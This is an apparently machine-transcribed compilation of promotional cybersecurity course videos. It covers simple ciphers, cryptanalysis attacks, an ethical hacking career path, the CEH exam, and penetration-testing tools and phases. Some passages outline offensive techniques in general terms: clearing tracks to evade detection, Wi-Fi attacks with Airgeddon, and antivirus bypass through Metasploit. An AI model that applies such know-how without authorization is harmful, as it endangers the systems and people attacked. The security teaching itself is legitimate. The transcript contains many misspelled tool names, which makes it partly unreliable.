yourself secure is using encryption now encryption can happen through cryptography what is cryptography cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to the normal user the only person with the key to unscramble that data would be able to unscramble it and make sense out of that data so we’re just making it unreadable or non-readable by using a particular key or a particular algorithm and then we’re going to send the key to the end user the end user using the uh same key would then decrypt that data if anybody compromises that data while it is being sent over the network since it is encrypted they would not be able to read it so the encryption algorithm would be something like this now if you see uh the computer word once made into unreadable format would look like eq o r xv gt for a end user it wouldn’t make any sense but the person who has a key to unscramble that would be able to convert it back to computer and then understand the meaning of that word so this is just a substitution cipher that is being shown on the screen so what is the alphabet the key is alphabet + 3 so c plus three alphabets that becomes e o becomes m becomes o so the key that is utilized to scramble the data is the character that you are at the third character from there would be the corresponding key so the encrypted message is also known as a cipher the decryption is just the other way around where you know the key now and you can now figure out what that e correspondent to by going back three characters in the alphabet most of the times a certified ethical hacker must decrypt a message without knowing the secret key so let’s say a ransomware has affected your organization or has affected a device and you want to figure out uh or you want to decrypt that data now as a ethical hacker you wouldn’t be for paying a ransom uh to the hacker would you so it is now your prerogative of how you’re going to work around and how you’re going to try to crack the encryption mechanism how to crack the cipher to decrypt that message and see what’s within it right decryption without the use of a secret key that is known as a crypt analysis crypto analysis is the reversing of an algorithm to figure out what the decryption was without using a key so cryp analysis can be done using various formats the first one is a brute force attack second is a dictionary attack the third one is a rainbow table attack a brute force attack is trying every combination permutation and combination of the key to figure out what the key was it is 100% successful but may take a lot of time a dictionary attack is where you have created a list of possible encryption mechanisms a list of possible cracks and then you try to figure out whether those cracks work or not rainbow tables are where you have an encrypted text in hand and you’re trying to figure out uh the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place so in the brute force attack you’re trying every possible combination permutation of what the key would be in dictionary attack you have a word list that would tantamount to the key and if you’re you’re trying to match all the words listed in the text file or the word list to see if any of those words are going to work to decrypt that data here in the rainbow table the cipher text is compared with another cipher text you find out similarities and then you try to work or reverse engineer your way accordingly so let’s have a quick demo on cryptography before we end this session so to begin with the demo of cryptography we are on a website called spammimic.com which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand so if I say I want to encode a message turn a short message into spam so what this does is want to send across a secret message you type in the secret message a short one and it will convert that into a spam mail you send it across so whoever is reading that spam mail would never get an idea of the embedded message within it so if I want to type in a message here hi this is a secret message the password is askd at the rate 1 2 3 4 and I want to send this out to people or to one of my colleagues but I want to send it out in a secret manner so that others are not aware of this so when I press on encode what the algorithm would do is it will convert this message into a spam mail so my message hi this is a secret message the password is at the rate 1 2 3 4 or asd at the rate 1 2 3 4 gets converted into this now if you read it dear e-commerce professional this letter was specially selected to be sent to you this doesn’t make sense there is nowhere or no reference to the actual message that I’ve already said so if I copy this entire message and I send it let’s say via email to the recipient now the thing is that the recipient needs to know that I’ve encoded it using spam mimic the algorithm rem need needs to remain the same so once they know that it is spam mimic what they can do is now in this instance what I’m going to do is I’m going to open up a new browser and I’m going to go to the same website and at this point in time I’m going to click on decode when I click on decode I’m going to paste the message that I have just copied there we are and this message is now being copied into a different browser and if I decode this you will see that it will convert it back to the original message that there was so the key is there at spam mimic and uh it is embedded within the message so whenever we paste the message in the decode factor it knows what the key was and it can decrypt that message and give me the actual message that was embedded within it there we are the entire message this is what we created in the Google Chrome browser and in the Firefox browser we decoded similarly if I want to protect these kind of messages there is an aspen encrypt.com website where let’s say we use text encryption and I want to encrypt the same message this is a secret message the password is ASD at the rate 1 2 3 4 and then I give it a password to protect this message let’s say the word password and I use the cipher to scramble this by using let’s say AES which is the strongest cipher right now and I say encrypt so this is what the encryption would look like and basically uh if I don’t have the password over here if I decrypt it you would see that the error has occurred now if I type in the password over here and then decrypt it it will be able to convert that back into the unscrambled text and it will give me what the original message was this is a secret message the password is ASD at the rate 1 2 3 4 so if I want to keep my data secure from hackers I want to scramble it in such a way that they would not be able to crack it or it would be very difficult from for them to crack it and this is one of the first mechanisms that would be recommended by any ethical hacker and before we begin if you are someone who is interested in building a career in cyber security or to become an ethical hacker by graduating from the best universities or a professional who elicits to switch career with cyber security or ethical hacker by learning from the experts then try giving a show to simply learn postgraduate program in cyber security with modules from MIT Schwarzman College of Computing the course link is mentioned in the description box below that will navigate you to the course page where you can find a complete overview of the program being offered hello everyone and welcome to this video on the hackers road map at the simpleland YouTube channel as vast as the field of cyber security is there’s often an overflow of information about it at the same time for people who wish to know more about how to venture into the cyber security or ethical hacking space it is very important for them to know what’s the career progression what are the skills needed and how a person with no or bare minimum knowledge can take their first step in this amazing career well this video is for all those individuals who wish to pursue a career in the field of cyber security and ethical hacking whether you are an entry- level professional a college graduate or an experienced professional looking to understand how a career in the field of cyber security progresses and what additional skills and responsibilities would you need as you grow in the field then you are at the right place so let’s get started with our topic the hacker’s road map and before we begin if you are someone who is interested in building a career in cyber security by graduating from the best universities or a professional who elicits to switch careers with cyber security by learning from the experts then try giving a shot to simply lens postgraduate program in cyber security with modules from MIT Schwarzman College of Engineering the course link is mentioned in the description box that will navigate you to the course page where you can find a complete overview of the program being offered and if these are the types of videos you would like to watch then hit the subscribe button like and press on the bell icon to never miss on further content so stay tuned with us until the end of this video and don’t forget to register your opinion in the comment section below and now we will start with what is ethical hacking and how is it different from hacking so in the world of cyber security hacking can be broadly categorized into two types ethical hacking and unethical hacking ethical hacking involves using the same tools and techniques as malicious hackers to identify and fix security vulnerabilities before they can be exploited and these expert known as whitehead hackers work with a focus on security rather on theft and on the other hand we have unethical hacking that refers to unauthorized access to digital devices or networks with malicious intent performed by black hackers and additionally there are greyhackers who possess knowledge in offensive and defensive computer use sometimes working as security consultants during the day and engaging in blackhead activities at night it is important to understand these distinctions to protect against cyber threats effectively now we’ll see the objective or roles of an ethical hacker ethical hackers also known as whitehead hackers use their skills and expertise to identify vulnerabilities in system and network before malicious hackers can exploit them their primary objective is to simulate real world attacks and help organization strengthen their security measures the role of an ethical hacker involves several key phases and we’ll see those roles and key phases so they are responsible for reconnaissance scanning gain and maintain access clear their tracks document their findings and compile detailed reports so firstly they conduct thorough reconance gathering information about the target system or organization this includes understanding the organization structure network infrastructure and potential weak points and through scanning they identify the easiest and quickest methods to gain access to the network and gather further information and once access is gained ethical hackers maintain it allowing them to exercise their privileges and control the connected systems this step helps them identify any potential security flaws and weaknesses within the network they also work to clear their tracks covering their footsteps to evade detection and ensuring the security personnel cannot trace their activities and throughout the entire process ethical hackers document their findings compile detailed reports on the vulnerabilities discovered and provide recommendations to address and mitigate the identified security issues their vulnerability goal is to help organization strengthen their defenses prevent data breaches and protect sensitive information from falling into the wrong hands ethical hacking is a crucial aspect of cyber security as it allows organizations to stay one step ahead of cyber threats by leveraging the skills of ethical hackers businesses can proactively identify and address vulnerabilities ensuring the overall security and integrity of their digital infrastructure so now we’ll see the skills that needed to be an ethical hacker so now we’ll see the skills so the first skill is knowledge of computer networks then it’s the programming languages then the knowledge of web applications databases ethical hacking tools and knowledge of common attack vectors and techniques then what certificates that are required for an ethical hacker now we will start with knowledge of computer networks understanding computer networks is fundamental for ethical hackers this includes concepts such as IP addressing network protocols example TCP IP routing switching and firewalls a strong grasp of how networks function will enable you to identify vulnerabilities and potential entry points the next is programming languages proficiency in programming languages is essential for effective ethical hacking languages like Python Java C++ and scripting languages such as Pearl or Ruby are widely used in this field programming skills enable you to write custom scripts and tools automate task and exploit vulnerabilities and the next we have is web applications in today’s digital landscape web applications are often the target of attacks therefore a solid understanding of web application architecture protocols example HTTP and security mechanisms example SSL TLS is crucial knowledge of web programming languages like HTML CSS JavaScript and frameworks like PHP or ASP.NET is also beneficial then we have databases so databases store and manage sensitive data making them attractive targets for hackers familiarize yourself with database management systems DBMS such as MySQL Oracle or Microsoft SQL Server learn about database security including access control encryption and vulnerability assessment then we should focus on the skill to have a knowledge on ethical hacking tools so to perform ethical hacking task efficiently you should be familiar with various hacking tools these include network scanners example end mapap vulnerability scanners example Nessus password crackers jo the rier packet snipers wireshock and exploitation frameworks metasloit mastering these tools will enhance your effectiveness as an ethical hacker then you should have knowledge of common attack vectors and techniques that is understanding common attack vectors and techniques is vital for an ethical hacker this includes knowledge of different types of malware social engineering network attacks that is DDoS and web application vulnerabilities example cross-ite scripting staying up to date with the latest threats and attack methodologies is crucial for effective defense the next is certificates so obtaining relevant certifications demonstrates your expertise and commitment to the field certificates like certified ethical hacker CH offensive security certificate professional OCP or CompTIA security plus are highly regarded within the industry they validate your skills and can boost your credibility when seeking ethical hacking opportunities the C certification is a multiplechoice exam that evaluates your understanding of the penetration testing structure and the tools that are utilized inside it it gives job seekers the information security field a head start by ensuring that the certificate holder understands the fundamentals such as information gathering attacking computers or servers wireless attacks and social engineering so the objective CH is inform the public that credentialized individuals meet or exceed the minimum standards second establish and govern minimum standards of credentiality third professional information security specialist in ethical hacking so now we will have an exam overview so the exam name is EC council certified ethical hacker and the exam duration is 240 minutes and you will get questions that is 125 questions you will get in the exam and it is a multiplechoice question exam and the passing score you need is 70% and to register for the exam you should go to Pearson view or ECC exam center and eligibility criteria for CH is there are two ways to satisfy the eligibility criteria that is attend official CH training and this can be in any format example instructorled training computer-based training or live online training as long as the program is approved by EC council and attempt without official training in order to be considered for the EC council certification exam without attending official training you must have two or more years of documented information security experience ra non-refundable eligibility application fee of $100 submit completed CH exam eligibility form including verification from an employer upon approval EC council will email you a voucher number to register for the CH exam so this was all about the CH exam and now we will move to the steps to become ethical hacker so ethical hacking is an exciting and rapidly growing field that requires a combination of technical skills knowledge and a strong sense of ethics by following these steps you can begin your journey towards becoming an ethical hacker and contribute to enhancing cyber security so step one that is knowledge of computer systems and networks step two you should have proficiency in programming languages step three networking and security concepts you should have a knowledge of it third knowledge of web application and database fifth understanding of operating systems step six familiarity with ethical hacking tools step seven problem solving and analytical thinking step eight knowledge of common attack vectors and techniques step nine certifications so now we will elaborate all the steps one by one so we’ll start with knowledge of computer systems and networks so to become an ethical hacker it is crucial to have a deep understanding of computer systems and networks this involves familiarizing yourself with the inner workings of computer system network protocols operating systems and how different components interact within a network environment by gaining this knowledge you will be better equipped to identify vulnerabilities and assess potential security risk and the next is proficiency in programming languages so programming languages are an essential tool for ethical hackers by gaining proficiency in programming languages such as Python C++ Java JavaScript SQL Pearl and Ruby you will be able to develop your own scripts automate task and create exploit codes these programming languages provide the foundation for writing secure and efficient code as well as manipulating and analyzing data the next step is networking and security concepts to effectively assess and secure networks it is important to have a solid understanding of networking and security concept this includes familiarizing yourself with topics such as network protocols network security principles encryption techniques and firewall configurations understanding how data is transmitted secured and protected in a network environment will enable you to identify potential vulnerabilities and implement appropriate security measures step four knowledge of web application and database knowledge so in today’s interconnected world web applications and databases are common targets for hackers therefore it is crucial to develop a strong understanding of web application architectures web protocols and database systems pay special attention to common vulnerabilities specific to web applications such as SQL injection cross-ite scripting XSS and cross-sight request forgery CSRF by gaining expertise in these areas you will be able to effectively assess the security of web applications and databases and provide appropriate recommendations for securing them and the next step is understanding of operating systems so operating systems form the backbone of computer systems and are often targeted by hackers it is important to gain a comprehensive understanding of different operating systems such as Windows Linux or Mac OS this includes understanding system configurations file permissions user management and security mechanisms specific to each operating system this knowledge will enable you to identify vulnerabilities apply patches and secure operating systems effectively step six familiarity with ethical hacking tools ethical hackers rely on a variety of tools to assess and secure systems and networks familiarize yourself with popular ethical hacking tools such as Matt Plot Wireshark Nap Burp Suit Kali Linux Canvas SQL Ninja and Bobby these tools provide functionalities for vulnerability scanning network sniffing exploit development and penetration testing understanding how to use these tools effectively will enhance your capabilities as an ethical hacker now we’ll see the step seven that is problem solving and analytical thinking so being an ethical hacker requires strong problem solving skills and the ability to think analytically you will often encounter complex systems and face intricate security challenges developing your problem solving abilities and analytical thinking will help you approach these challenges systematically identify vulnerabilities and deise effective strategies to mitigate risk it is essential to stay updated with the latest security trends and technologies to enhance your problem solving skills and the step it is knowledge of common attack vectors and techniques so to defend against potential threats you must familiarize yourself with common hacking techniques and attack vectors used by malicious hackers this includes social engineering fishing attacks password cracking network based attacks and more understanding how these attacks work and the methodologies used will enable you to proactively identify and prevent potential security breaches and now the step nine that is certifications while certifications are not mandatory to start a career in ethical hacking they can provide a structured learning path and validate your skills and knowledge consider pursuing certifications such as certified ethical hacker CH Offensive Security Certified Professional OCP Certified Information System Security Professional CISSP Certified Penetration Testing Engineer CPTE and Certified Security Analyst ECSA these certifications demonstrate your expertise and dedication to the field enhancing your credibility as an ethical hacker now we’ll see the job roles in ethical hacking field so starting with like there are several job roles in ethical hacking such as here’s an elaboration on each job role in ethical hacking and we’ll see some of the major ethical hacker job roles so starting with ethical hacker so an ethical hacker is a skilled professional who legally attempts to penetrate computer system and networks to identify vulnerabilities and weaknesses they use their knowledge to strengthen the security infrastructure and protect against cyber threats and the next is network security engineer network security engineers specialize in securing and

    maintaining computer networks within an organization they implement and manage security measures such as firewalls intrusion detection systems and virtual private networks that is VPNs to protect sensitive data then we have cyber security analyst so cyber security analyst monitor and analyze systems for potential security breaches or incidents they investigate threats develop security protocols and implement measures to protect against attacks the next is penetration tester penetration testers also known as ethical hackers simulate real world attacks to identify vulnerabilities in computer systems networks and applications they conduct thorough assessments and provide recommendations for improving security the next is information security manager information security managers are responsible for overseeing an organization’s overall security strategy and ensuring the protection of sensitive data they develop and implement security policies manage security teams and handle incident response and the next is cyber security engineer so cyber security engineers design and implement security systems including firewalls encryption protocols and intrusion detection systems they also conduct risk assessments and perform security audits to maintain a security environment and the next is security consultant security consultants provide expert advice and guidance on security strategies and solutions they assess vulnerabilities develop security plans and assist organizations in improving their overall security posture in the United States these requirements are very high and this was all for this tutorial did you know that in August this year Google openly admitted that some of its Gmail accounts were hacked by an Iranian group fortunately the event was isolated and was taken care of but rarely are security breaches this easy to stop with more and more data moving to the cloud the prospects of hacks like these have grown in the past decade exponentially consequently organizations have now discovered the need to secure the digital infrastructure against various attack vectors fueling the need for ethical hackers in the IT industry see today’s video is all about how you can learn the ins and outs of hacking and cyber security irrespective of your learning background so welcome to our video on how to become an ethical hacker by simply learning before we get started ensure you’re subscribed to our channel so you always stay updated with the latest technologies and trends let’s first clear the air on an ethical hacker’s role the term hacking has inherently negative connotations however this will only be applicable until the duty of an ethical hacker is properly understood ethical hackers are the good people in the hacking field wearing the white hat so what exactly is the responsibility of an ethical hacker instead of utilizing their extensive computer expertise for criminal purposes ethical hackers find gaps in data and computer security for businesses and organizations worldwide to defend themselves against hackers with less than noble intentions ethical hacking is a subcategory of cyber security that involves lawfully breaking a system security mechanisms in order to discover possible threats and data leaks on the network ethical hackers can work for a corporation as independent freelancers in-house security staff for its website or its applications or as simulated offensive cyber security professionals as well all of these careers need knowledge of current attack methodologies and tools albeit the in-house expert may need to be knowledgeable about a single kind of software or digital asset but how can you hone your ethical hacking skills let’s take a look at few steps one can take while starting a career in this field the first step is getting comfortable with Linux there are operating systems catered specifically to ethical hackers like Kali Linux and Parrot Security both are based on Linux derivatives and have a plethora of tools to make your hacking workflow easy and relatively stress-free the better vers you are with Linux and its terminal the quicker you can achieve things when hacking the next would be to master the mother of all programming languages which is the C programming language since Linux and a lot of backend code are written in C having a strong hand over this programming language is very important it’s always helpful to learn a couple more relevant languages like Python or JavaScript which will help you dissect giant pieces of server code like butter remaining anonymous is vital in the hacking sphere since giving a malicious actor news of your existence on a target network can cause him then to flee or attack your device instead the usage of MAC address randomizers and proxy chains is highly beneficial and recommended when monitoring networks for criminal activity and speaking of proxies ethical hackers must understand networking fundamentals and exactly how they are established learning about various networks and protocols might help you exploit flaws an ethical hacker with an extensive understanding of networking tools such as Wireshark Nap and others can overcome field incidents relatively unscathed the fifth skill in our list is traversing the dark web using the famous to browser most of the internet is hidden behind the tour networks and getting a closer look at the people who often are at the forefront of the hacking industry in the dark web directly can help you familiarize yourself with a certain domain secrets while keeping you updated with the latest happenings in the cyber crime world a major advantage that can tip the scales in the favor of an ethical hacker is the knowledge of cryptography or encryption encryption is used in various elements of information security including authentication data integrity anonymity and others passwords and other sensitive information are always encrypted on a network a hacker must understand how to recognize and break these encryption standards exploiting vulnerabilities make you a better ethical hacker simply keeps you aware of the security measures that are kept in place as industry standards while handing you the most advanced penetration testing tools on the market learning how to scan networks and systems for vulnerabilities that might result in a security breach ethical hackers may also attempt to write vulnerabilities to exploit the system in question as a final tip join forums for conversations with other hackers worldwide to trade share expertise and collaborate discord Reddit Telegram and other platforms all have communities where you can join and collaborate with fellow learners to broaden your learning spectrum now that we understand some basic skills ethical hackers need to excel in this domain let us look at the road map one can follow to get started many ethical hackers begin their careers by studying computer science you can also acquire an A+ certification from compia by appearing for and passing two additional tests these tests assess an individual’s understanding of PC components and their ability to disassemble and reassemble a PC however before advancing in your profession you must gather experience and obtain a network plus or a CCNA certification the Network Plus certification certifies fundamental network expertise such as network administration maintenance deployment and troubleshooting the CCNA certification guarantees the same skills and strives for foundation level proficiency once qualified you can advance to the next level of your career in network support you’ll be responsible for monitoring and upgrading installing security software and testing for vulnerabilities you’ll obtain expertise in network security and your goal should be offered as a position as a network engineer as a network engineer you will build and plan networks rather than simply maintain them your focus should now be on the security part of your journey to becoming an ethical hacker this is the time to focus on earning a security certifications such as security plus or CISSP the US Department of Defense has approved the security plus acquisition which covers testing on critical areas such as access control identity authentication and cryptography the CISSP certification is a worldwide recognized security acquisition that validates the expertise of risk management cloud technology and application development the next step would be to start working in the information security division an information security analyst studies systems and network security engages with security breaches and strives to implement security solutions for this profession you should focus on penetration testing to gain hands-on experience is some of the most essential tools of the trade getting the certified ethical hacker or the CE certification should be your top priority the training will teach you all you must understand to become a productive and ethical hacker you will be engaged in a hands-on environment where you will be guided through breaking into a network and finding any security flaws after obtaining this certification you can begin marketing yourself as a professional ethical hacker we have already covered some skills one needs to learn when starting their journey however an ethical hacker has certain roles and responsibilities that must be carried out meticulously the first of which is threat modeling threat modeling is optimizing network security by identifying vulnerabilities and determining counter measures for avoiding or reducing an attack’s impact on the system a threat is a real or projected negative incident jeopardizing the organization’s assets the role of an ethical hacker is to give a thorough assessment of potentially harmful assaults and their potential consequences they can also conduct information security audits or a risk based evaluation of a company’s security these regular exercises assess security readiness identify IT system weaknesses and offer strategies for reducing future attack threats they also assess how successfully security related policies are implemented resulting in a report that includes discovered flaws and appropriate solutions ethical writers must be able to collect data detect vulnerabilities and coordinate risks to create clear and unambiguous professional reports these evaluations are frequently used to justify finalizing security asset expenditures the market for trained ethical hackers has never been this expansive according to various surveys the job outlook for ethical hackers and information security analysts is supposed to grow by 33% between 2020 and 2030 companies like IBM Google and Microsoft are always on the lookout for trained cyber security personnel in this climate of data breaches and security vulnerabilities we hope this video has cleared some doubts regarding where to start and what to learn during this journey when it comes to web app hacking it generally refers to the exploitation of applications by HTTP which can be done by manipulating the applications via its graphical user interface this is done by tampering with the uniform resource identifier also known as a URI or tampering with the HTTP elements directly which are not a part of the URI the hacker can send a link via an email or a chat and may trick the users of a web application into executing actions in case the attack is on an administrator account the entire web application can be compromised anyone who uses a computer connected to the internet is susceptible to the threats that computer hackers and online predators pose these online villains typically use fishing scams spam email or instant messages and bogus websites to deliver dangerous malware to your computer and compromise your computer security computer hackers can also try to access your computer and private information directly if you’re not protected by a firewall they can monitor your conversations or peruse the back end of your personal website usually disguised with a bogus identity predators can lure you into revealing sensitive personal and financial information a web server which can be referred to as the hardware the computer or the software which helps to deliver content that can be accessed through the internet the primary function of a web server is to deliver these web pages on the request to clients using the hypertext transfer protocol or HTTP so hackers attack the web server to steal credential information passwords and business information by using different types of attacks like DOS attacks SYN flooding ping flood port scan and social engineering attacks in the area of web security despite strong encryption on the browser server channel web users still have no assurance about what happens at the other end although wireless networks offer great flexibility they have their own security problems a hacker can sniff the network packets without having to be in the same building where the network is located as wireless networks communicate through radio waves a hacker can easily sniff the network from a nearby location most attackers use network sniffing to find the SSID and hack a wireless network an attacker can attack a network from a distance and therefore it is sometimes difficult to collect evidence against the main hacker social engineering is the art of manipulating users of a computing system into revealing confidential information which can be later used to gain unauthorized access to a computer system the term can also include activities such as exploiting human kindness greed and curiosity to gain access to restricted access buildings or getting the users to installing backdoor software knowing the tricks used by hackers to trick users into releasing vital login information is fundamental in protecting computer systems coming to our main focus for today let us have a look at the top five most essential ethical hacking tools to be used in 2021 at the top of the chain lies N MAPAP nap which stands for network mapper is a free and open-source utility for network discovery and security auditing many systems and network administrators also find it useful for tasks such as network inventory managing service upgrade schedules and monitoring host or service uptime it is most beneficial in the early stages of ethical hacking where a hacker must figure the possible entry point to a system before running the necessary exploits thus allowing the hackers to leverage any insecure openings and thus breach the device lmap uses raw IB packets in novel ways to determine what hosts are available on the network what service they are running what operating systems are installed what type of packet filters and firewalls are in use and dozens other characteristics it was designed to rapidly scan large networks but works fines against single host as well since every application that connects to a network needs to do so via a port the wrong port or a server configuration can open a can of worms which lead to a thorough breach of the system and ultimately a fully hacked device next on our list we have Metasloit the Metasloit framework is a very powerful tool that can be used by cyber criminals as well as ethical hackers to probe systematic vulnerabilities on both networks and servers because it’s an open-source framework it can be easily customized and used with most operating systems with Metasloit the ethical hacking team can use readymade or custom code and introduce it into a network to probe for weak spots as another flavor of threat hunting once the flaws are identified and documented the information can be used to address systemic weaknesses and prioritize solutions once a particular vulnerability is identified and the necessary exploit is fed into the system there are a host of options for the hacker depending on the vulnerability hackers can even run root commands from the terminal allowing complete control over the activities of the compromised system as well as all the personal data stored on the device a big advantage of metas-ploit is the ability to run full-fledged scans on the target system which gives a detailed picture of the security index of the system along with the necessary exploits that can be used to bypass the antivirus software having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers as denoted by its high rank in the list moving on we have the Aunetics framework akinetics is an end-to-end web security scanner which offers a 360deree view of an organization security it is an application security testing tool that helps the company address vulnerability across all their critical web assets the need to be able to test application in depth and further than traditional vulnerability management tools has created a market with several players in the application security space ainetics can detect over 7,000 vulnerabilities including SQL injections cross-sight scripting misconfigurations weak passwords exposed database and other outofband vulnerabilities it can scan all pages web apps and complex web applications running HTML 5 and JavaScript as well it also lets you scan complex multi-level forms and even password protected areas of the site iconetics is a dynamic application security testing package which has definite perks over status application security testing frameworks which are also known as SAS scanners sas tools only work during development and only for specific languages and have a history of reporting lot of false positives whereas dynamic testing tools also known as DAT have the ability to streamline testing from development to deployment with minimal issues next on our list we have Air Gaddaden this is a multi-use bash script used for Linux systems to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts along with being able to launch denial of service attacks on compromised networks this multi-purpose Wi-Fi hacking tool has very rich features which support multiple methods for Wi-Fi hacking including WPS hacking modes WP attacks handshake captures evil twin and so much more it usually needs an external network adapter that supports monitor mode which is necessary to be able to capture wireless traffic that reverse the air channels thanks to its open-source nature Air Garden can be used with multiple community plugins and add-ons thereby increasing its effectiveness against a wide variety of routers both in the 2.4 GHz and the 5 GHz band finally at number five we have John the Ripper john the Ripper is an open-source password security auditing and the password recovery tool which is available for many operating systems john the Ripper Jumbo supports hundred of hash and cipher types including for user passwords of operating systems web apps database servers encrypted keys and document files some of the key features of the tool include offering multiple modes to speed up the password cracking automatically deselecting the hashing algorithm used by the passwords and the ease of running and configurating the tool to make it password cracking easier it can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources the word list being used in these dictionary attacks can be used by the users and allowing for a completely customizable process we also have a few honorary mentions in our list that just missed the cut netsparker for instance is an automated yet fully configurable web application security scanner that enables you to scan websites web applications and web services the scanning technology is designed to help you secure web applications easily without any fuss so you can focus on fixing the reported vulnerabilities the Burp suit professional is one of the most popular penetration testing and vulnerability finder tools and is used for checking web application security the term Burp as it is commonly known is a proxy based tool which is used to evaluate the security of web- based application and to do hands-on testing moving away from websites and applications Wireshark is a free and open-source packet analyzer which was launched in 2006 it is used for network troubleshooting analysis software and communications protocol development and education it captures network traffic on the local network and stores data for offline analysis vshark captures network traffic from Ethernet Bluetooth wireless networks and frame relay connections now that we learn about the different types of tools that can be used when conducting an ethical hacking audit let’s learn about some potential benefits of such campaigns and why organizations prefer to pay for such audits being able to identify defects from an attacker’s perspective is game-changing since it displays all the potential avenues of a possible hack one can only prepare for the known vulnerabilities as a defensive specialist but proactively trying to breach a network or device can make hackers think of techniques that no defense contractors can account for this kind of unpredictability goes a long way in securing a network against malicious actors another advantage of hiring ethical hackers is the ability to preemptively fix possible weak points in a company’s network infrastructure as seen on many occasions a real breach will cause loss of data and irreparable damage to the foundation of an organization being able to gauge such shortcomings before they become public and can be used exploited is a benefit most organizations make use of this is not to imply that such security audits are only beneficial to the organization paying for it when coming across companies that provide certain services a reliable third party security audit goes a long way in instilling trust and confidence over their craft if the ethical hackers cannot find any major vulnerabilities that can be leveraged by hackers it just accentuates the technical brilliance of the organization and its engineers thereby increasing the clientele by a substantial amount in this we are going to discuss ethical hacking and penetration testing so we’re going to talk about the concepts about what constitutes an ethical hack and what is a penetration test we’re going to talk about the different types of penetration test and how they can be done we’re going to talk about an operating system called Kali Linux and we’re going to talk about its usage and its importance in cyber security we will also be discussing the different phases of penetration test and how people or hackers would utilize these phases uh to gain their objectives we’ll also be discussing in what areas can we do a penetration test how to do those penetration tests we’ll be discussing a quite a few bit of penetration testing tools that are available in the Kali Linux space and then we’ll be looking at a couple of demos at the end of the session to understand how these tools in the operating system can be utilized for various hacks so let’s start it with what is ethical hacking now plainly defined ethical hacking is locating weaknesses or vulnerabilities of computers and information systems using the intent and actions of a malicious hacker the major difference is here that we are hired to discover those weaknesses in a legal and ethical manner that means first and foremost our intent should not be malicious we do not wish any harm to the organization and whatever we discover is reported back and not misused once we report back we would also be trying to help them out to mitigate or remove those weaknesses or vulnerabilities to enhance the company’s security posture so essentially we would have the same training or the same knowledge as that of a malicious hacker except that the intent is going to be different the intent is going to help the organization achieve security to protect themselves against malicious hackers and the second most important thing about ethical hacking is that we are authorized to do that activity i cannot in good faith hack somebody and then tell them you know what I just I just wanted to help you out and uh here are your vulnerabilities and uh this is the way you can prevent them i first need the authorization from the other party and only then can I perform a ethical hack so in this example hacker attacks an individual with malicious intent and makes misuse of whatever information they have gotten they steal the data they maybe fry the operating system hardware destroy it and thus uh they leave the victim without uh a device with authorization an ethical hacker can also attack the same individual minus the destruction of course and the intent is good so they’re willingly finding out the vulnerabilities and helping the victim plug them out so that they wouldn’t be a victim of a malicious attack now here the first thing is authorization from the victim and the second thing is the good intent where we do not misuse those vulnerabilities and we report them back to the victim or to the client and help them uh patch those vulnerabilities that’s the main difference between a white hat and a black hat so security experts are normally termed as white hat hackers malicious hackers are termed as black hats now the responsibilities of a ethical hacker are multiffold first and foremost you have to create scripts test for vulnerabilities first have to identify those in the first place so there’s a vulnerability assessment identifying those vulnerabilities and then you’re going to test them to see the validity and the complexity of those vulnerabilities so your one of your responsibilities would be to develop tools to increase security as well or to configure security in such a way that it would be difficult to breach performing risk assessment now what is a risk risk is a threat that is posed to an organization by a possibility of getting hacked so let’s say I as a ethical hacker run a vulnerability scanner on a particular client i identify 10 different vulnerabilities within those 10 vulnerabilities I do a risk assessment to identify which vulnerability is critical would have the most impact on the client and what would be the repercussions if those vulnerabilities actually get exploited so I’m trying to find out in risk assessment that if the client gets hacked with the vulnerabilities identified what is the loss they would be facing once they get hacked and the loss could not only be loss of data it could be financial losses it could be loss of reputation penalties they have to pay to the client for breaches or penalties that they may have to pay for pay the governments in case of breaches that happened that uh couldn’t be controlled another responsibility of the ethical hacker is to set up policies in such a way that it becomes difficult for hackers to get access to devices or to protected data and finally train the staff for network security so uh we got a lot of employees in an organization we need to train the staff of what is allowed and what is not allowed how to keep themselves secure so that they don’t get compromised thus becoming a vulnerability themselves to the organization the policies that we have talked about are administrative policies to govern the employees of the organization for example password policies most of the organizations will have a tough password policy where they say you have to create a password that meets a certain level of complexity before that can be accepted and till you create that password you’re not allowed to log in or you’re not allowed to register so let’s move on to understand what is penetration testing now for penetration testing there is a phase called vulnerability assessment that happens before this vulnerability assessment is nothing but running a scanning tool to identify a list of potential flaws or vulnerabilities within the organization once you have identified the list of those vulnerabilities you would then move on to penetration test this is the part of ethical hacking where it specifically focuses on penetration only of the information systems so you have identified that flaw maybe it could be a database with a SQL injection or it could be uh a buffer over overrun flaw or it could be a simple password cracking attempt your idea is to create those tools create those attacks and try to penetrate into those areas where security is weak uh the essence of penetration testing is to penetrate information systems using various attacks the attacks could be anything like a fishing attack a password cracking attack a denial of service attack or any other vulnerabilities that you have identified uh during the vulnerability scan so what is Kali Linux and why is it used kali Linux is an operating system oftenly used by hackers and ethical hackers both because of the tool sets that the operating system contains it is a operating system created by professionals with a lot of embedded tools it is a DVN based operating system with advanced penetration testing and security auditing features there are more than 600 plus odd tools on that operating system that can help you leverage any of the attacks man-in-the-middle attacks sniffing password cracking uh any of these attacks would be possible with all the tools available you just need to know how to utilize the operating system and its tools contains like I said a hundred of hundreds of tools that are used for various information security tasks like uh computer forensics re reverse engineering information finding even uh getting access to different machines and then uh creating viruses worms to anything that you will 600 plus tools in the Kali Linux operating system there are periodic updates that are given out to the operating system as well it is open source that means it is free to utilize you can even have the source code you can modify it if you want too there’s customizations available for all the tools you can download third party tools and install them if you want there’s a wide support for wireless uh network cards multiple languages are being supported at the time at the same time as well and you can create a lot of attacking uh scripts you can create attacking tools and you can write your own exploits as well on Kali Linux so this all all in all helps you create a very robust system where you can create your own attacks and then launch them against unsuspecting victims now that is illegal so as far ethical hacking is concerned once you have authorization you’re going to identify which tools to be utilized you’re going to get the appropriate permissions and only then are you going to attempt those attacks let’s talk about the phases of penetration testing now there are five different phases the first one is the reconnaissance phase also known as the information gathering phase this is the most important phase for any hacker this is where the hacker or the ethical hacker if you will will gather as much information about the targets victim or vice versa the vict the victim right so once you have that information you would then be able to identify what tool sets to include and how to attack the victim for example you want to find out the IP addresses the domains subdomains the network architecture that is being utilized you want to identify operating systems that are being utilized the network IP ranges that are being utilized and so on so forth you might want to identify employees within an organization for social engineering attacks in the future email addresses telephone numbers 